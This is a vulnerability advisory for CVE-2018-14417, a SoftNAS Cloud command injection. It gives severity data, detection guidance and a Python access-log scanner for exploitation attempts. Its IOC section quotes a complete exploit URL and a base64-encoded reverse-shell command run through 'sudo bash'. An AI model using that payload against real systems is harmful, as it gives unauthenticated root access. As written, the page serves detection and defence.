CVE-2018-14417
published 2018-08-04


Priority: P186 · critical 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploited in the wild (ITW exploit)
EPSS: 89.58% (99.8th percentile)
A command injection vulnerability was found in the web administration console in SoftNAS Cloud before 4.0.3. In particular, the snserv script did not sanitize the 'recentVersion' parameter from the snserv endpoint, allowing an unauthenticated attacker to execute arbitrary commands with root permissions.

Affected (1 range)

Vendor    Product   Version range   Fixed in
softnas   cloud     < 4.0.3         4.0.3

Detection & IOCs (extracted from sources)

url:     /softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash;
path:    /softnas/snserver/snserv.php
command: echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx | base64 -d | sudo bash
path:    /softnas/applets/update/
  • Monitor HTTP GET requests to /softnas/snserver/snserv.php containing semicolons or shell metacharacters in the 'recentVersions' parameter, which indicate command injection attempts.
  • The snserv endpoint requires no authentication; alert on any unauthenticated requests to snserv.php with opcode=checkupdate or opcode=executeupdate from external/untrusted sources.
  • Detect base64-encoded reverse shell payloads piped through 'sudo bash' in web server request parameters, particularly the pattern 'base64 -d | sudo bash' in URL query strings.
  • Alert on the apache process spawning child shell processes (bash/sh) with sudo privileges, as exploitation results in root command execution via the apache sudoer configuration.
  • Dual opcode parameters in the same request (opcode=checkupdate&opcode=executeupdate) are a strong indicator of an exploitation attempt against this vulnerability.
  • The sudoers configuration grants the apache user unrestricted root command execution (NOPASSWD: ALL), meaning any command injected via the web interface runs as root. This overly permissive sudoers entry is a key enabler of full system compromise.
  • The vulnerable snserv.php endpoint performs no authentication or session verification, making it reachable by any unauthenticated network attacker with access to the web administration console.
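The detection bullets above can be turned into a single log-scanning rule. The script below is an added example written for this page, not code from SoftNAS or from the advisory sources. It assumes Apache combined-format access logs, treats 10.0.0.0/8 and 192.168.0.0/16 as the management networks (an assumption; adjust to your environment), and runs over three constructed log lines: a plausible benign update check, a request shaped like the IOC URL on this page but with a placeholder base64 blob instead of a real payload, and an unrelated request. It flags the four signals the bullets describe: duplicate opcode values, update opcodes from an untrusted source, shell metacharacters in recentVersions / recentVersion, and the "base64 -d | sudo bash" pipeline in the query string.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit, unquote_plus

# Constructed sample log lines (not real traffic). The second line mirrors the
# shape of the IOC URL on this page with a placeholder base64 string.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Aug/2018:10:00:01 +0000] "GET /softnas/snserver/snserv.php?opcode=checkupdate&recentVersions=4.0.2 HTTP/1.1" 200 512
203.0.113.9 - - [04/Aug/2018:10:00:07 +0000] "GET /softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6a.1a&update_type=standard&recentVersions=3.6a.1a;echo+UExBQ0VIT0xERVI%3d+|+base64+-d+|+sudo+bash; HTTP/1.1" 200 128
198.51.100.2 - - [04/Aug/2018:10:00:09 +0000] "GET /softnas/index.php HTTP/1.1" 200 2048
"""

TARGET_PATH = "/softnas/snserver/snserv.php"
UPDATE_OPCODES = {"checkupdate", "executeupdate"}
# Assumed management networks; requests from anywhere else are "untrusted".
TRUSTED_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Apache combined log format: client, ident, user, [timestamp], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SHELL_META = re.compile(r"[;|&`$]")
B64_SUDO = re.compile(r"base64\s+-d\s*\|\s*sudo\s+bash")


def parse_query(query):
    """Split a query string on '&' only and percent-decode both sides.

    Older parse_qs() versions also split on ';', which would hide exactly the
    injected separator we want to see, so the split is done by hand here.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def analyze_request(client_ip, target):
    """Return the list of detection reasons for one request target (path?query)."""
    parts = urlsplit(target)
    if parts.path != TARGET_PATH:
        return []
    qs = parse_query(parts.query)
    reasons = []

    # 1. Two opcode values in one request (checkupdate + executeupdate).
    opcodes = qs.get("opcode", [])
    if len(opcodes) > 1:
        reasons.append("multiple opcode values: " + ",".join(opcodes))

    # 2. Update opcodes from outside the management networks (endpoint is unauthenticated).
    if UPDATE_OPCODES & set(opcodes):
        ip = ip_address(client_ip)
        if not any(ip in net for net in TRUSTED_NETS):
            reasons.append("update opcode from untrusted source " + client_ip)

    # 3. Shell metacharacters in the parameter that snserv passes to a shell.
    for key in ("recentVersions", "recentVersion"):
        if any(SHELL_META.search(v) for v in qs.get(key, [])):
            reasons.append("shell metacharacters in " + key)

    # 4. The decode-and-run-as-root pipeline anywhere in the decoded query.
    if B64_SUDO.search(unquote_plus(parts.query)):
        reasons.append("'base64 -d | sudo bash' pipeline in query string")
    return reasons


def scan_log(text):
    """Scan access-log text; return one hit dict per line that triggers a reason."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyze_request(m["ip"], m["target"])
        if reasons:
            hits.append({"ip": m["ip"], "target": m["target"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["target"][:70])
        for reason in hit["reasons"]:
            print("   -", reason)
```

The benign-looking first line still produces one hit (update opcode from an untrusted source), which is intentional: the page's guidance is to alert on any external request to these opcodes because the endpoint has no authentication. Tune TRUSTED_NETS rather than dropping that rule.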

CVSS provenance

NVD v3.0: 9.8 CRITICAL   CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 10.0 CRITICAL  AV:N/AC:L/Au:N/C:C/I:C/A:C